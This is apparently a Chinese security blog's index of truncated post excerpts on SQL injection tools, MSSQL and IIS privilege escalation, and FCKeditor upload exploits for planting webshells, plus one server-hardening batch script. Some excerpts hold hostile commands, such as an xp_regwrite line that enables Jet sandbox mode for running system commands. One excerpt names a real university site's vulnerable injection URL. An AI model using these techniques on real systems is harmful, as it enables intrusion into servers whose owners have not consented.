众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞。
BSQL Hacker
BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进行SQL溢出注入。 BSQL Hacker…
-
-
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
<object runat=server id=oScriptlhn scope=page classid=”clsid:72C24DD5-D70A-438B-… -
以下方法都以需要SA权限为前提。
1, 沙盒模式的变通.
原始方法:第一句开启沙盘模式:exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
第二句利用jet.oledb执行系统命令:select * from o… -
目标站:http://jiaowu.lzjtu.edu.cn/
存在注入漏洞的页面:http://jiaowu.lzjtu.edu.cn/articles.php?id=607
加点后直接报出了网站的物理路径
再试:and 1=1 正常 &nb…
-
以下保存为bat文件,运行时还需xcacls.vbs这个东东,可以到网上下载。
:: 禁用WS命令行组件
regsvr32 /s wshom.ocx:: 防止WINDOWS漏洞[粘滞键]的”变态入侵之有史以来最酷的Windows后门sethc.exe”cscript.exe xcacls.vbs “%SystemRoot%/system32/sethc.exe” /D Ever… -
作者: kyo327
EMail: humour327@163.com
QQ: 10952989
日期: 2012-01-12[ 目录 ]
0×00 前言
0×01 初期的探索
0×02 看到一点希望
0×03 从二级域名入手
0… -
首先,你得确定下Fckeditor的版本。
/FCKeditor/editor/dialog/fck_about.html
其次,你确定下以下几个上传页面是否真的被删除了呢?
/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/… -
1.acunetix web vulnerability Scanner 4 简称AC4
2.另外以下一种方式走的通,就不用往下走了
3.个人爱好用Portready,是因为他快速准确,当然你也可以用别的.
4.AC4扫描很耗时间,扫一个网站大约需要3-5个小时,扫整个网段大约需要8个小时左右
方法:
1.X-SCAN扫描目标服务器(一般是没有漏洞,收集信息用吧),看看IIS写权限有漏洞吗,用53溢出或者其…
-
首先用wwwscan扫一下网站目录,扫描的结果为:
由扫描结果可知,该网站的服务器用IIS6提供web服务,并且这个网站用到了Fckeditor编辑器。
那么接下来的渗透思路就有了,利用Fck编辑器的文件上传漏洞配合着IIS6的解析漏洞来得到webshell.
首先要找到一个可用的fck上传页面,例如:http://www.y…
-
该网站倒是做了防注入的,一般的页面上不存在注入点,可惜防注入还是不够严密,某个页面的一个搜索框没有检测用户提交上来的数据,直接将用户提交的数据带入到数据库中查询,导致出现了搜索型的注入漏洞。
在搜索框中输入1’,发现页面暴错:
根据暴错页面我们可以得知网站的物理路径和网站用的是MSSQL数据库,并且从url处发现搜索的关键字是以GET形式提交的。
我…
Older Posts